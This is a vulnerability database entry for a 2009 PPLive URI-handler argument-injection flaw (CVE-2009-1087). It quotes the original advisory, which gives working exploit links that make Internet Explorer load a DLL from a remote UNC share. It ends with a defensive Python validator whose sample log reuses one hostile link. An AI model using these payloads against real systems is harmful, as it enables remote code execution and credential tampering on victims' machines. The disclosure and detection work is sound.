PPLive URI Handler LoadModule Parameter Multiple Code Execution Vulnerabilities

Vulnerability ID: 1117477    Vulnerability type: Input validation
Published: 2009-03-16    Updated: 2009-04-07
CVE ID: CVE-2009-1087    CNNVD ID: CNNVD-200903-431
Platform: Windows    CVSS score: 9.3
|Vulnerability sources
https://www.exploit-db.com/exploits/8215
https://www.securityfocus.com/bid/34128
https://cxsecurity.com/issue/WLB-2009030236
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-431
|Vulnerability details
PPLive is a very popular P2P network video client. PPLive's synacast://, Play://, pplsv:// and ppvod:// URI handlers do not properly validate the URI parameters before evaluating them as command-line arguments. If a user is tricked into following a link that contains a specially crafted /LoadModule parameter, Internet Explorer can be made to load a DLL from a remote UNC path chosen by the attacker.
|Vulnerability EXP
--------------------------------------------------------------------------------
PPLive <= 1.9.21 uri handlers "/LoadModule" remote argument injection
by Nine:Situations:Group::strawdog
--------------------------------------------------------------------------------
software site:http://www.pplive.com/en/index.html
our site: http://retrogod.altervista.org/

software description:
"PPLive is a peer-to-peer streaming video network created in Huazhong University
of Science and Technology, People's Republic of China. It is part of a new
generation of P2P applications, that combine P2P and Internet TV, called P2PTV."

vulnerability:
The "synacast://", "Play://", "pplsv://" and "ppvod://" URI handlers do not
verify certain parts of the URI before evaluating command line parameters.
This can be exploited against Internet Explorer to e.g. load a dll from a remote
UNC path via the "/LoadModule" parameter, example exploit (IE7):

synacast://www.microsoft.com/?"%20/LoadModule%20\1.2.3.4\unc_share\sh.dll%20"
Play://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"

against older versions:
pplsv://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"
ppvod://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"

test dll which adds new credentials / spawns the telnet server:
http://retrogod.altervista.org/9sg_pplive_sh.html

some interesting readings:
http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx

--------------------------------------------------------------------------------

# milw0rm.com [2009-03-16]
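The root cause described in the details section and in the advisory above is that the handler hands the URI to a command line without checking for characters that escape the quoted argument placeholder. The following is an added defensive example, not code from the CNNVD entry, the advisory author or PPLive: a validator that rejects any PPLive-scheme URI which, once percent-decoded, contains quote or whitespace characters, an embedded command-line switch, or a UNC path, plus a scanner that applies the same check to lines of a proxy log. The log format, the function names and the benign `synacast://example.com/channel/123` link are assumptions; the hostile sample line reuses the ppvod:// example already quoted in the advisory.

```python
import re
from urllib.parse import unquote, urlsplit

# Schemes the advisory lists as registered by PPLive; anything else is out of scope.
PPLIVE_SCHEMES = {"synacast", "play", "pplsv", "ppvod"}

# A Windows protocol handler typically receives the URI through a quoted "%1"
# placeholder; a double quote or whitespace in the decoded URI breaks out of it.
BREAKOUT_CHARS = re.compile(r'["\s]')
# A token that looks like a command-line switch once the quoting is broken (e.g. /LoadModule).
SWITCH_TOKEN = re.compile(r'(?:^|\s)/[A-Za-z]+')
# A UNC-style path (\\host\share, or the single-backslash variant seen in the advisory).
UNC_PATH = re.compile(r'\\\\?[A-Za-z0-9.-]+\\')
# Finder for PPLive URIs embedded in free text such as proxy logs (log format is hypothetical).
URI_FINDER = re.compile(r'\b(?:synacast|play|pplsv|ppvod)://\S+', re.IGNORECASE)


def check_handler_uri(uri: str) -> list[str]:
    """Return the reasons a URI should be refused; an empty list means it looks benign."""
    reasons = []
    scheme = urlsplit(uri).scheme.lower()
    if scheme not in PPLIVE_SCHEMES:
        return [f"unexpected scheme {scheme!r}"]
    # Validate what the handler will actually see, not the percent-encoded form.
    decoded = unquote(uri)
    if BREAKOUT_CHARS.search(decoded):
        reasons.append("quote or whitespace would break out of the quoted %1 argument")
    if SWITCH_TOKEN.search(decoded):
        reasons.append("embedded command-line switch after the URI")
    if UNC_PATH.search(decoded):
        reasons.append("UNC path inside the URI")
    return reasons


def flag_uris(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Scan text lines (e.g. proxy logs) and return every PPLive URI that fails the check."""
    findings = []
    for line in lines:
        for uri in URI_FINDER.findall(line):
            reasons = check_handler_uri(uri)
            if reasons:
                findings.append((uri, reasons))
    return findings


# Constructed sample log lines: one benign link and the ppvod:// example quoted in the advisory.
SAMPLE_LOG = [
    r'GET /watch?u=synacast://example.com/channel/123 200',
    r'GET /watch?u=ppvod://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20" 200',
]

if __name__ == "__main__":
    for uri, reasons in flag_uris(SAMPLE_LOG):
        print(uri)
        for reason in reasons:
            print("  -", reason)
```

The check decodes before inspecting because the injected quote, the space and the backslashes all arrive percent-encoded in the link and only become dangerous after the browser or the handler decodes them; a filter that looks at the raw link would miss them. The same rule applied inside the handler itself (refuse the URI, never append it to a command line) is the fix the advisory implies.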
|Affected products
PPLive PPLive 1.9.21